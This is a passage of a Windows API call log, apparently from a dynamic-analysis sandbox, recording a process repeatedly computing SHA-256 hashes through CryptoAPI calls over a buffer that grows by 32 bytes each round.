hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.872] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x860, dwFlags=0x0) returned 1 [0230.872] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.872] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320080, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320080, pdwDataLen=0x12e8b8) returned 1 [0230.872] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.872] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.872] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.873] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.873] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x880, dwFlags=0x0) returned 1 [0230.873] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.873] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3200b0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3200b0, pdwDataLen=0x12e8b8) returned 1 [0230.873] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.873] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.873] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.873] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.873] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0230.873] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.873] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3200e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3200e0, pdwDataLen=0x12e8b8) returned 1 [0230.873] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.873] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.873] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.874] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.874] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0230.874] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.874] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320110, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320110, pdwDataLen=0x12e8b8) returned 1 [0230.874] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.874] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.874] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.875] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.875] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0230.875] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.875] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320140, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320140, pdwDataLen=0x12e8b8) returned 1 [0230.875] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.875] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.875] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.875] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.875] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x900, dwFlags=0x0) returned 1 [0230.875] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.875] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320170, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320170, pdwDataLen=0x12e8b8) returned 1 [0230.875] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.875] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.875] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.876] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.876] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x920, dwFlags=0x0) returned 1 [0230.876] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.876] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3201a0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3201a0, pdwDataLen=0x12e8b8) returned 1 [0230.876] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.876] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.876] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.876] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.876] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x940, dwFlags=0x0) returned 1 [0230.876] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.876] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3201d0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3201d0, pdwDataLen=0x12e8b8) returned 1 [0230.876] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.876] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.876] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.877] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.877] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x960, dwFlags=0x0) returned 1 [0230.877] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.877] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320200, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320200, pdwDataLen=0x12e8b8) returned 1 [0230.877] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.877] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.877] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.877] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.877] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x980, dwFlags=0x0) returned 1 [0230.877] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.877] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320230, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320230, pdwDataLen=0x12e8b8) returned 1 [0230.877] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.877] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.877] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.878] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.878] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0230.878] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.878] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320260, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320260, pdwDataLen=0x12e8b8) returned 1 [0230.878] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.878] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.878] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.878] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.878] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0230.878] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.878] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320290, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320290, pdwDataLen=0x12e8b8) returned 1 [0230.878] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.878] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.878] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.879] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.879] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0230.879] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.879] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3202c0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3202c0, pdwDataLen=0x12e8b8) returned 1 [0230.879] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.879] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.879] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.879] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.879] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0230.879] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.879] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3202f0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3202f0, pdwDataLen=0x12e8b8) returned 1 [0230.880] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.880] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.880] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.880] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.880] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0230.880] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.880] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320320, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320320, pdwDataLen=0x12e8b8) returned 1 [0230.880] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.880] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.880] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.880] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.880] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0230.881] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.881] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320350, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320350, pdwDataLen=0x12e8b8) returned 1 [0230.881] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.881] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.881] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.881] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.881] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0230.881] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.881] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320380, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320380, pdwDataLen=0x12e8b8) returned 1 [0230.881] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.881] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.881] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.882] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.882] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0230.882] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.882] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3203b0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3203b0, pdwDataLen=0x12e8b8) returned 1 [0230.882] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.882] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.882] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.882] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.882] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0230.882] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.882] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3203e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3203e0, pdwDataLen=0x12e8b8) returned 1 [0230.882] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.882] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.882] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.883] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.883] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0230.883] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.883] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fc90, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fc90, pdwDataLen=0x12e8b8) returned 1 [0230.883] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.883] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.883] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.883] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.883] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0230.883] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.883] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320460, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320460, pdwDataLen=0x12e8b8) returned 1 [0230.883] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.883] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.883] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.884] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.884] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0230.884] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.884] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3204c0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3204c0, pdwDataLen=0x12e8b8) returned 1 [0230.884] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.884] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.884] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.884] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.884] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0230.884] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.884] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3204f0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3204f0, pdwDataLen=0x12e8b8) returned 1 [0230.884] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.884] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.884] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.885] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.885] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0230.885] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.885] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320520, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320520, pdwDataLen=0x12e8b8) returned 1 [0230.885] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.885] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.885] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.885] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.885] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0230.885] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.885] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320550, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320550, pdwDataLen=0x12e8b8) returned 1 [0230.885] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.885] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.885] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.886] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.886] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0230.886] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.886] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320580, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320580, pdwDataLen=0x12e8b8) returned 1 [0230.886] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.886] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.886] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.886] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.886] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0230.886] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.886] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3205b0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3205b0, pdwDataLen=0x12e8b8) returned 1 [0230.886] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.887] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.887] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.887] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.887] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0230.887] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.887] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3205e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3205e0, pdwDataLen=0x12e8b8) returned 1 [0230.887] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.887] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.887] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.887] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.887] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0230.888] CryptGetHashParam (in: 